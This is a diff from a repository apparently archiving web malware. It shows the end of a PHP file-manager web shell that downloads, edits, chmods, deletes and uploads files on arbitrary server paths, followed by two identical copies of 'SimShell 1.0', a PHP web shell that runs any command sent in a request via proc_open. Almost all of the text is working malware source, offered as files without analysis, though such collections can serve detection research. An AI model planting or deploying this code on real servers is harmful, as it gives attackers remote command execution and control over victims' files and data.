echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
}else {
echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
}
}else {
echo "&nbsp;";
}
echo "
</a></font></td>
<td width='77' align='center' nowrap>";
if (is_file($dir.$file))
{
if (is_readable($dir.$file)){
echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
}else {
echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
}
}else {
echo "&nbsp;";
}
echo "
</a></font></td>
<td width='86' align='center' nowrap>";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
echo "<font size='1' color='#999999'>Dont in windows";
}
else {
echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
}
echo "</a></font></td>
<td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
</tr>
";
}
closedir($dh);
}
}
echo "</table>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='hidden' name='MAX_FILE_SIZE' value='300000' />
Send this file: <input name='userfile' type='file' />
<inpt type='hidden' name='Fupath' value='$dir'>
<input type='submit' value='Send File' />
</form>
</div>";
}
//Upload Files
$rpath=$_GET['dir'];
if ($rpath <> "") {
$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
print "<pre>";
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
echo "<script language='javascript'> history.back(2)</script>";
}
}
//file deleted
$frpath=$_GET['fdelete'];
if ($frpath <> "") {
if (is_dir($frpath)){
$matches = glob($frpath . '/*.*');
if ( is_array ( $matches ) ) {
foreach ( $matches as $filename) {
unlink ($filename);
rmdir("$frpath");
echo "<script language='javascript'> alert('Success! Please refresh')</script>";
echo "<script language='javascript'> history.back(1)</script>";
}
}
}
else{
echo "<script language='javascript'> alert('Success! Please refresh')</script>";
unlink ("$frpath");
echo "<script language='javascript'> history.back(1)</script>";
exit(0);
}
}
?>
</td>
</tr>
<tr>
<td style="border: 1px dotted #FFCC66">
<p align="center"><font color="#666666" size="1" face="Tahoma"><br>
Copyright 2004-Simorgh Security<br>
Hossein-Asgari<br>
</font><font color="#c0c0c0" size="1" face="Tahoma">
<a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
<font color="#666666">www.simorgh-ev.com</font></a></font></td>
</tr>
</table>
</div>
</body>
</html>

180
web-malware-collection-13-06-2012/PHP/SimShell 1.0 - Simorgh Security MGZ.php Normal file
View file

@ -0,0 +1,180 @@
<?php
/*Simorgh Security Magazine */
session_start();
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd();
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) {
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
}
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $_REQUEST['command']);
$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(__FILE__);
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
if ($regs[1][0] == '/') {
$new_dir = $regs[1];
} else {
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} else {
chdir($_SESSION['cwd']);
$length = strcspn($_REQUEST['command'], " \t");
$token = substr($_REQUEST['command'], 0, $length);
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open($_REQUEST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
?>
<head>
<title>SimShell - Simorgh Security MGZ</title>
<link rel="stylesheet" href="Simshell.css" type="text/css" />
<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
</script>
</head>
<body onload="init()" style="color: #00FF00; background-color: #000000">
<span style="background-color: #000000">
</body>
</body>
</html>
</span>
<p><span style="background-color: #000000">&nbsp;Directory: </span> <code>
<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code></p>
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
<div style="width: 900; height: 454">
<textarea name="output" readonly="readonly" cols="120" rows="20" style="color: #CCFF33; border: 1px dashed #FF0000; background-color: #000000">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea>
<p class="prompt" align="justify">
cmd:<input class="prompt" name="command" type="text"
onkeyup="key(event)" size="60" tabindex="1" style="border: 1px dotted #808080">
<input type="submit" value="Enter" /><input type="submit" name="reset" value="Reset" /> Rows:
<input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" />
</p>
<p class="prompt" align="center">
<br>
<br>
&nbsp;<font color="#C0C0C0" size="2">Copyright 2004-Simorgh Security<br>
Make On PhpShell Kernel<br>
<a href="http://www.simorgh-ev.com" style="text-decoration: none">
<font color="#C0C0C0">www.simorgh-ev.com</font></a></font></p>
</div>
</form>
</html>

180
web-malware-collection-13-06-2012/PHP/SimShell 1.0 - Simorgh Security MGZ.txt Normal file
View file

@ -0,0 +1,180 @@
<?php
/*Simorgh Security Magazine */
session_start();
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd();
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) {
$_REQUEST['command'] = stripslashes($_REQUEST['command']);
}
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $_REQUEST['command']);
$_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(__FILE__);
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
if ($regs[1][0] == '/') {
$new_dir = $regs[1];
} else {
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} else {
chdir($_SESSION['cwd']);
$length = strcspn($_REQUEST['command'], " \t");
$token = substr($_REQUEST['command'], 0, $length);
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open($_REQUEST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
header('Content-Type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
?>
<head>
<title>SimShell - Simorgh Security MGZ</title>
<link rel="stylesheet" href="Simshell.css" type="text/css" />
<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
</script>
</head>
<body onload="init()" style="color: #00FF00; background-color: #000000">
<span style="background-color: #000000">
</body>
</body>
</html>
</span>
<p><span style="background-color: #000000">&nbsp;Directory: </span> <code>
<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code></p>
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
<div style="width: 900; height: 454">
<textarea name="output" readonly="readonly" cols="120" rows="20" style="color: #CCFF33; border: 1px dashed #FF0000; background-color: #000000">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea>
<p class="prompt" align="justify">
cmd:<input class="prompt" name="command" type="text"
onkeyup="key(event)" size="60" tabindex="1" style="border: 1px dotted #808080">
<input type="submit" value="Enter" /><input type="submit" name="reset" value="Reset" /> Rows:
<input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" />
</p>
<p class="prompt" align="center">
<br>
<br>
&nbsp;<font color="#C0C0C0" size="2">Copyright 2004-Simorgh Security<br>
Make On PhpShell Kernel<br>
<a href="http://www.simorgh-ev.com" style="text-decoration: none">
<font color="#C0C0C0">www.simorgh-ev.com</font></a></font></p>
</div>
</form>
</html>

Some files were not shown because too many files have changed in this diff Show more